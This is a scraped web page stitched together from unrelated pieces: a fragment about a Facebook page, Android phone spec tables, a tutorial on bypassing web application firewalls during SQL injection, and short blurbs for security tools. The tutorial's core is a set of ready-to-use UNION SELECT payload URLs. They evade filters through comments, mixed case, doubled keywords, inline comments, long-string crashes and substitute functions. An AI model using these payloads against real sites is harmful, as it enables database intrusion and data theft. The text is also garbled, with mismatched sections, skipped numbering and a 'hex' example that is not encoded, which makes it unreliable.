Things Required:
- Facebook Page
- Scripts
click on “Edit Tab”
OS | Android OS, v4.1.2 (Jelly Bean) | |
Memory | 8GB built-in, 1GB RAM, microSD card (supports up to 64GB) | |
Processor | Dual core 1.2 GHz, Broadcom BC28155 Chipset |
OS | Android OS, 4.1 Jelly Bean | |
Memory | 4GB built-in + 8GB card included in box, 1GB RAM, microSD card(supports up to 32GB) | |
Processor | Quad-core 1.2 GHz, ARMv7 Chipset, GPU (PowerVR SGX) |
OS | Android Jelly Bean (v 4.1) | |
Memory | 4GB ROM, 512 RAM, microSD card (supports up to 32GB) | |
Processor | 1GHz Dual Core |
OS | Android OS, v4.1 (Jelly Bean) | |
Memory | 4GB built-in, 512MB RAM, microSD card(supports uo to 32 GB) | |
Processor | Dual core 1.2 GHz Cortex-A9 |
OS | Android OS, v4.1 (Jelly Bean) | |
Memory | 8GB built-in 1GB RAM, microSD Card (supports up to 32GB) | |
Processor | Dual-core 1 GHz, Qualcomm MSM8230 Snapdragon Chipset |
Android OS, v4.1.1 (Jelly Bean) | ||
Memory | 16/32/64GB built-in, 2GB RAM, microSD card (supports up to 64GB) | |
Processor | Quad-core 1.6 GHz Cortex-A9 |
Android OS, v4.0.4 (Ice Cream Sandwich) | ||
Memory | 16/32/64GB built-in, 1GB RAM, microSD card (supports up to 64GB) | |
Processor | Quad-core 1.4 GHz Cortex-A9 + Mali-400MP GPU, Exynos 4212 Quad |
OS | Android OS, v4.1.2 (Jelly Bean), upgradable to v4.2.2 (Jelly Bean) | |
Memory | 32/64GB built-in, 2GB RAM | |
Processor | Quad-core 1.7 GHz Krait 300, Qualcomm APQ8064T Snapdragon 600 Chipset |
OS | Android OS, v4.1.2 (Jelly Bean), planned upgrade to v4.2 (Jelly Bean) | |
Memory | 16GB built-in 2GB RAM, microSD Card (supports up to 32GB) | |
Processor | Quad-core 1.5 GHz Krait, Qualcomm MDM9215M / APQ8064 Chipset |
Let’s Begin!
How to know if there is a Web Application Firewall?
This is pretty simple! When you try to enter a command used for SQL Injections (usually the “UNION SELECT” command), you get an 403 Error (and the website says “Forbidden” or “Not Acceptable”).
Example:
http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4....
(We get a 403 Error!)
First, of course, we need to know the Basic Methods to bypass WAF…
1) Comments:
You can use comments to bypass WAF:
Code:
http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4....
(First Method that can Bypass WAF)
2) Change the Case of the Letters:
You can also change the Case of the Command:
Code:
http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4....
(Another Basic Method to Bypass WAF!)
3) Combine the previous Methods:
What you can also do is to combine the previous two methods:
Code:
http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4....
This method is not detectable by many Web Application Firewalls!
Some Firewalls remove the “UNION SELECT” Statement when it is found in the URL… We can do this to exploit this function:
Code:
http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4....
(The "union" and the "select" will be removed, so the final result will be: "UNION SELECT" 😀 )
5) Inline Comments (Thanks to Crysan):
Some firewalls get bypassed by Inserting Inline Comments between the “Union” and the “Select” Commands:
Code:
http://www.site.com/index.php?page_id=-15 UnION/**/SElecT 1,2,3,4...
(The U is equal to "U" and S to "S". See more on the Advanced Section....)
Advanced Methods:
Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!
1) Buffer Overflow / Firewall Crash:
Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!
Code:
http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4....
(( You can test if the WAF can be crashed by typing:
?page_id=null
/**//*!50000UnIOn*//*yoyu*/all/**/
/*!SeLEct*/
/*nnaa*/+1,2,3,4....
2) Replace Characters with their HEX Values (Thanks to Crysan!):
We can replace some characters with their HEX (URL-Encoded) Values.
Example:
Code:
http://www.site.com/index.php?page_id=-15 /*!union*/ /*!select*/ 1,2,3,4....
(which means "union select")
3) Use other Variables or Commands instead of the common ones for SQLi:
Apart from the “UNION SELECT” other commands might be blocked.
Common Commands Blocked:
COMMAND | WHAT TO USE INSTEAD
@@version | version()
concat() | concat_ws() --> Difference between concat() and concat_ws(): http://is.gd/VEeiDU
group_concat() | concat_ws()
Code:
http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4...
(If the Firewall removes the "*", the result will be: 15+union+select....)
[+] In addition to the previous example, some other bypasses might be:
-15+(uNioN)+(sElECt)....
-15+(uNioN+SeleCT)+...
-15+(UnI)(oN)+(SeL)(ecT)+....
-15+union (select 1,2,3,4...)
The Network Security Toolkit is bootable ISO live CD/DVD (NST Live) is based on Fedora. The toolkit was designed to provide easy access to best-of-breed Open Source Network Security Applications and should run on most x86/x86_64 platforms.
Server Analyser is a service for detecting and analyzing web-based threats. It currently handles shells, obfuscated JavaScript, Executables, Iframes and port scans.